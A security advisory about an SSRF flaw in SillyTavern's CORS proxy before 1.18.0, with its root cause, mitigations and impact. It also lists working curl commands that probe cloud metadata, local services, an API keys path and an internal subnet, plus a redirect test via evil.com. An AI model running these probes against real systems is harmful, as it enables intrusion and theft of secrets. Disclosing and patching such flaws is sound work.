SillyTavern, SSRF, CVE (unknown) (medium)

Listen to this Post

The vulnerability exists in the optional CORS proxy of SillyTavern versions prior to 1.18.0. The flaw resides in `src/middleware/corsProxy.js` at line 31, where the `corsProxyMiddleware` function takes a user-supplied URL from `req.params.url` and passes it directly to the `fetch(url, …)` function. No destination allowlist is enforced, and only circular requests to the proxy’s own host are blocked. This allows an attacker to craft a request to `/proxy/:url()` with an arbitrary target, including internal IP addresses (e.g., 127.0.0.1, 192.168.x.x), link-local addresses, or cloud metadata endpoints. The server then initiates an outbound request to that target and returns the response. The attack does not require authentication, and the proxy does not validate redirects, so an external server can redirect to an internal resource. The root cause is the lack of server-side request filtering. SillyTavern 1.18.0 introduced a generic request filter (Private Request Whitelisting) but disabled it by default, requiring administrators to enable and configure it manually for network-hosted instances.

dailycve form:

Platform: SillyTavern
Version: <1.18.0
Vulnerability: SSRF
Severity: Medium
date: Pre-1.18.0

Prediction: 2024-05-15 (with 1.18.0 release)

Analytics under What Undercode Say:

Check if vulnerable endpoint exists
curl -i "http://target:8000/proxy/http://169.254.169.254/latest/meta-data/"
Test internal port scan
curl "http://target:8000/proxy/http://127.0.0.1:22"
Verify redirect exploitation
curl -v "http://target:8000/proxy/http://evil.com/redirect-to-internal"

Exploit:

Simple exploit to read localhost service
curl "http://vulnerable-sillytavern:8000/proxy/http://127.0.0.1:3000/api/keys"
Enumerate internal network via HTTP status
for i in 192.168.1.{1..254}; do curl -s -o /dev/null -w "%{http_code} $i\n" "http://target:8000/proxy/http://$i:80"; done

Protection from this CVE:

  • Upgrade to SillyTavern 1.18.0 or later.
  • Enable and configure the Private Request Whitelisting filter.
  • Block RFC1918, loopback, link-local, and metadata ranges in the allowlist.
  • Apply same validation to redirects.
  • Run the instance only in trusted networks if filter is disabled.

Impact:

An attacker can access internal network services (databases, internal APIs, monitoring endpoints), read cloud instance metadata (e.g., AWS IMDSv1), perform internal port scans, and exfiltrate sensitive data by pivoting through the vulnerable proxy.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top